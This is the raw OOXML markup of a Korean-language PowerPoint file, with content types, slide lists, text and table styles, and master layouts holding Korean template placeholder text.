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notesSlides/notesSlide2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags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Layouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/tags/tag4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide38.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide45.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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34.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide23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tags/tag12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags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tags/tag7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags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ags/tag5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide19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8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tags/tag3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml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46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44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42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6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags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notesSlides/notesSlide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags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tags/tag6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags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notesSlides/notesSlide29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide47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tags/tag2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Default Extension="wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/notesSlides/notesSlide18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide36.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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notesSlides/notesSlide25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide43.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide10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9" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId50"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId51"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="263" r:id="rId2"/>
    <p:sldId id="663" r:id="rId3"/>
    <p:sldId id="662" r:id="rId4"/>
    <p:sldId id="588" r:id="rId5"/>
    <p:sldId id="628" r:id="rId6"/>
    <p:sldId id="627" r:id="rId7"/>
    <p:sldId id="658" r:id="rId8"/>
    <p:sldId id="606" r:id="rId9"/>
    <p:sldId id="607" r:id="rId10"/>
    <p:sldId id="608" r:id="rId11"/>
    <p:sldId id="609" r:id="rId12"/>
    <p:sldId id="613" r:id="rId13"/>
    <p:sldId id="610" r:id="rId14"/>
    <p:sldId id="611" r:id="rId15"/>
    <p:sldId id="612" r:id="rId16"/>
    <p:sldId id="584" r:id="rId17"/>
    <p:sldId id="685" r:id="rId18"/>
    <p:sldId id="694" r:id="rId19"/>
    <p:sldId id="692" r:id="rId20"/>
    <p:sldId id="691" r:id="rId21"/>
    <p:sldId id="722" r:id="rId22"/>
    <p:sldId id="724" r:id="rId23"/>
    <p:sldId id="725" r:id="rId24"/>
    <p:sldId id="726" r:id="rId25"/>
    <p:sldId id="727" r:id="rId26"/>
    <p:sldId id="719" r:id="rId27"/>
    <p:sldId id="720" r:id="rId28"/>
    <p:sldId id="721" r:id="rId29"/>
    <p:sldId id="696" r:id="rId30"/>
    <p:sldId id="697" r:id="rId31"/>
    <p:sldId id="698" r:id="rId32"/>
    <p:sldId id="699" r:id="rId33"/>
    <p:sldId id="700" r:id="rId34"/>
    <p:sldId id="723" r:id="rId35"/>
    <p:sldId id="701" r:id="rId36"/>
    <p:sldId id="702" r:id="rId37"/>
    <p:sldId id="703" r:id="rId38"/>
    <p:sldId id="706" r:id="rId39"/>
    <p:sldId id="707" r:id="rId40"/>
    <p:sldId id="708" r:id="rId41"/>
    <p:sldId id="710" r:id="rId42"/>
    <p:sldId id="711" r:id="rId43"/>
    <p:sldId id="717" r:id="rId44"/>
    <p:sldId id="709" r:id="rId45"/>
    <p:sldId id="712" r:id="rId46"/>
    <p:sldId id="713" r:id="rId47"/>
    <p:sldId id="714" r:id="rId48"/>
    <p:sldId id="715" r:id="rId49"/>
  </p:sldIdLst>
  <p:sldSz cx="10693400" cy="7561263"/>
  <p:notesSz cx="7099300" cy="10234613"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="ko-KR"/>
    </a:defPPr>
    <a:lvl1pPr algn="ctr" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="50000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="ctr" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="50000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="ctr" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="50000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="ctr" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="50000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="ctr" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="50000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
      <a:defRPr sz="2400" b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" charset="0"/>
        <a:ea typeface="굴림" pitchFamily="50" charset="-127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</p:showPr>
  <p:clrMru>
    <a:srgbClr val="006600"/>
    <a:srgbClr val="114B51"/>
    <a:srgbClr val="25A2AF"/>
    <a:srgbClr val="CC0000"/>
    <a:srgbClr val="D7C577"/>
    <a:srgbClr val="EAEAEA"/>
    <a:srgbClr val="FFFF66"/>
    <a:srgbClr val="FFFF99"/>
  </p:clrMru>
</p:presentationPr>
</file>

<file path=ppt/tableStyles.xml><?xml version="1.0" encoding="utf-8"?>
<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}">
  <a:tblStyle styleId="{3C2FFA5D-87B4-456A-9821-1D502468CF0F}" styleName="테마 스타일 1 - 강조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5FD0F851-EC5A-4D38-B0AD-8093EC10F338}" styleName="밝은 스타일 1 - 강조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8799B23B-EC83-4686-B30A-512413B5E67A}" styleName="밝은 스타일 3 - 강조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BC89EF96-8CEA-46FF-86C4-4CE0E7609802}" styleName="밝은 스타일 3 - 강조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7678" autoAdjust="0"/>
    <p:restoredTop sz="96327" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="-1608" y="-876"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2382"/>
        <p:guide pos="336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0" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="-2454" y="-102"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3224"/>
        <p:guide pos="2237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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId55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handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId3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7321" cy="512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622" tIns="47311" rIns="94622" bIns="47311" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="946619" latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr kumimoji="1" sz="1300" b="0">
                <a:latin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0854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20290" y="0"/>
            <a:ext cx="3077320" cy="512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622" tIns="47311" rIns="94622" bIns="47311" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="946619" latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr kumimoji="1" sz="1300" b="0">
                <a:latin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0854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720755"/>
            <a:ext cx="3077321" cy="512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622" tIns="47311" rIns="94622" bIns="47311" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="946619" latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr kumimoji="1" sz="1300" b="0">
                <a:latin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0854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20290" y="9720755"/>
            <a:ext cx="3077320" cy="512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622" tIns="47311" rIns="94622" bIns="47311" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="946619" latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr kumimoji="1" sz="1300" b="0">
                <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{439A6DEE-44CE-46E7-8DC4-F03666347EFF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7321" cy="512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622" tIns="47311" rIns="94622" bIns="47311" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="946619" latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr kumimoji="1" sz="1300" b="0">
                <a:latin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0290" y="0"/>
            <a:ext cx="3077320" cy="512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622" tIns="47311" rIns="94622" bIns="47311" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="946619" latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr kumimoji="1" sz="1300" b="0">
                <a:latin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45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33438" y="766763"/>
            <a:ext cx="5432425" cy="384016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24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9761" y="4862015"/>
            <a:ext cx="5679778" cy="46050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622" tIns="47311" rIns="94622" bIns="4731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noProof="0" smtClean="0"/>
              <a:t>마스터 텍스트 스타일을 편집합니다</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" noProof="0" smtClean="0"/>
              <a:t>둘째 수준</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" noProof="0" smtClean="0"/>
              <a:t>셋째 수준</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" noProof="0" smtClean="0"/>
              <a:t>넷째 수준</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" noProof="0" smtClean="0"/>
              <a:t>다섯째 수준</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024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20755"/>
            <a:ext cx="3077321" cy="512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622" tIns="47311" rIns="94622" bIns="47311" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="946619" latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr kumimoji="1" sz="1300" b="0">
                <a:latin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024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0290" y="9720755"/>
            <a:ext cx="3077320" cy="512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622" tIns="47311" rIns="94622" bIns="47311" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="946619" latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr kumimoji="1" sz="1300" b="0">
                <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FF114A41-5E5C-450E-A429-032AC92CCCCA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1pPr>
    <a:lvl2pPr marL="4572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2pPr>
    <a:lvl3pPr marL="9144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3pPr>
    <a:lvl4pPr marL="13716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4pPr>
    <a:lvl5pPr marL="18288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슬라이드 이미지 개체 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5539" name="슬라이드 노트 개체 틀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defTabSz="954908"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65540" name="슬라이드 번호 개체 틀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511A37B-2500-4C3B-9AF7-A49EF91AEA19}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR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08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altLang="ko-KR" baseline="0" dirty="0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2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altLang="ko-KR" baseline="0" dirty="0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294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altLang="ko-KR" baseline="0" dirty="0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397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altLang="ko-KR" dirty="0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49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altLang="ko-KR" dirty="0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601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altLang="ko-KR" baseline="0" dirty="0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704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altLang="ko-KR" dirty="0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F114A41-5E5C-450E-A429-032AC92CCCCA}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR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806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altLang="ko-KR" dirty="0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806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altLang="ko-KR" dirty="0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963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defTabSz="954908" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0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806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altLang="ko-KR" dirty="0" smtClean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806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altLang="ko-KR" dirty="0" smtClean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806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altLang="ko-KR" dirty="0" smtClean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806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altLang="ko-KR" dirty="0" smtClean="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806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altLang="ko-KR" dirty="0" smtClean="0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806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altLang="ko-KR" dirty="0" smtClean="0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16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altLang="ko-KR" baseline="0" dirty="0" smtClean="0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523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altLang="ko-KR" dirty="0" smtClean="0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625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altLang="ko-KR" dirty="0" smtClean="0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547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ko-KR" altLang="ko-KR" dirty="0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475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altLang="ko-KR" dirty="0" smtClean="0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035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altLang="ko-KR" baseline="0" dirty="0" smtClean="0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035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altLang="ko-KR" baseline="0" dirty="0" smtClean="0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0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altLang="ko-KR" dirty="0" smtClean="0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0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altLang="ko-KR" dirty="0" smtClean="0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0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altLang="ko-KR" dirty="0" smtClean="0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342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altLang="ko-KR" dirty="0" smtClean="0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342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altLang="ko-KR" dirty="0" smtClean="0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445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altLang="ko-KR" dirty="0" smtClean="0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547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ko-KR" altLang="ko-KR" dirty="0" smtClean="0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슬라이드 이미지 개체 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06499" name="슬라이드 노트 개체 틀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altLang="ko-KR" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106500" name="슬라이드 번호 개체 틀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8140DBF-A6A0-4F5F-972C-5C7ABBA5DCD9}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR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680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altLang="ko-KR" baseline="0" dirty="0" smtClean="0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슬라이드 이미지 개체 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07523" name="슬라이드 노트 개체 틀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ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107524" name="슬라이드 번호 개체 틀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0C719EC-68FB-4E96-906E-5A49F3D31B14}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0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854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ko-KR" altLang="en-US" dirty="0" smtClean="0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슬라이드 이미지 개체 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10595" name="슬라이드 노트 개체 틀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ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110596" name="슬라이드 번호 개체 틀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E436478-CA1D-4915-9781-A4A0A8E93113}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"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슬라이드 이미지 개체 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10595" name="슬라이드 노트 개체 틀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ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110596" name="슬라이드 번호 개체 틀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E436478-CA1D-4915-9781-A4A0A8E93113}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"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슬라이드 이미지 개체 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10595" name="슬라이드 노트 개체 틀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ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110596" name="슬라이드 번호 개체 틀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E436478-CA1D-4915-9781-A4A0A8E93113}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"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161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ko-KR" altLang="ko-KR" dirty="0" smtClean="0"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altLang="ko-KR" dirty="0" smtClean="0"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366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ko-KR" altLang="en-US" dirty="0" smtClean="0"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469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altLang="ko-KR" dirty="0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758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ko-KR" altLang="en-US" dirty="0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680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altLang="ko-KR" dirty="0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782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altLang="ko-KR" baseline="0" dirty="0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885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altLang="ko-KR" dirty="0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987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altLang="ko-KR" dirty="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0" descr="contents-slide copy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-179388" y="-177800"/>
            <a:ext cx="11053763" cy="791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39" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3116263" y="2627313"/>
            <a:ext cx="7577137" cy="865187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FAFADC"/>
                </a:solidFill>
              </a:defRPr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14342" name="Rectangle 6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6067425" y="5230813"/>
            <a:ext cx="4625975" cy="1717675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              <a:buNone/>
              <a:defRPr sz="2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>마스터 부제목 스타일 편집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B67733-A9EC-45F3-A42B-633583389859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7848600" y="180975"/>
            <a:ext cx="2465388" cy="6767513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0850" y="180975"/>
            <a:ext cx="7245350" cy="6767513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4662408-50C1-424D-891B-9735387A8A91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4D10D2-6212-44AC-85ED-3FC53086FC4C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44550" y="4859338"/>
            <a:ext cx="9090025" cy="15017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44550" y="3205163"/>
            <a:ext cx="9090025" cy="16541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Rectangle 12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A2ABE6-5878-47E5-B704-AD423C5C039B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0850" y="1404938"/>
            <a:ext cx="4854575" cy="55435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5457825" y="1404938"/>
            <a:ext cx="4856163" cy="55435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536F6E-539B-4287-B235-C81F958BEB2D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34988" y="303213"/>
            <a:ext cx="9623425" cy="1260475"/>
          </a:xfrm>
        </p:spPr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534988" y="1692275"/>
            <a:ext cx="4724400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534988" y="2397125"/>
            <a:ext cx="4724400" cy="43576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5432425" y="1692275"/>
            <a:ext cx="4725988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5432425" y="2397125"/>
            <a:ext cx="4725988" cy="43576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Rectangle 12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3A8D7D-BA43-43B7-8F4A-F25C576EC6AE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Rectangle 12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65F9E4-4E92-4DE4-8453-DAA7EB09DA5B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2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72AA78-085B-4313-83CC-C8006AE79FFB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34988" y="301625"/>
            <a:ext cx="3517900" cy="1281113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181475" y="301625"/>
            <a:ext cx="5976938" cy="6453188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534988" y="1582738"/>
            <a:ext cx="3517900" cy="51720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Rectangle 12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0AD6E6-913A-46B5-9E7A-4F98BC0C7FF7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095500" y="5292725"/>
            <a:ext cx="6416675" cy="6254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2095500" y="676275"/>
            <a:ext cx="6416675" cy="453548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ko-KR" altLang="en-US" noProof="0" smtClean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2095500" y="5918200"/>
            <a:ext cx="6416675" cy="88741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Rectangle 12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7171F8-9468-43F0-9AC5-E6B8B4AD923F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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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20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jpeg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7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36" descr="내용슬라이드바닥부분그림(우) copy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2701925" y="6765925"/>
            <a:ext cx="7989888" cy="798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3" descr="내용슬라이드의 제목 그림"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10693400" cy="1455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35" descr="내용슬라이드바닥부분그림(좌)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3327400"/>
            <a:ext cx="2876550" cy="4233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204" name="Rectangle 12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051300" y="7237413"/>
            <a:ext cx="2493963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06" tIns="45654" rIns="91306" bIns="45654" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr kumimoji="1" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E51CE923-8A8B-4378-B98D-5DB79E88E9B6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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 1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0850" y="1404938"/>
            <a:ext cx="9863138" cy="554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306" tIns="45654" rIns="91306" bIns="4565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dirty="0" smtClean="0"/>
              <a:t>마스터 텍스트 스타일을 편집합니다</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>둘째 수준</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 셋째 수준</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
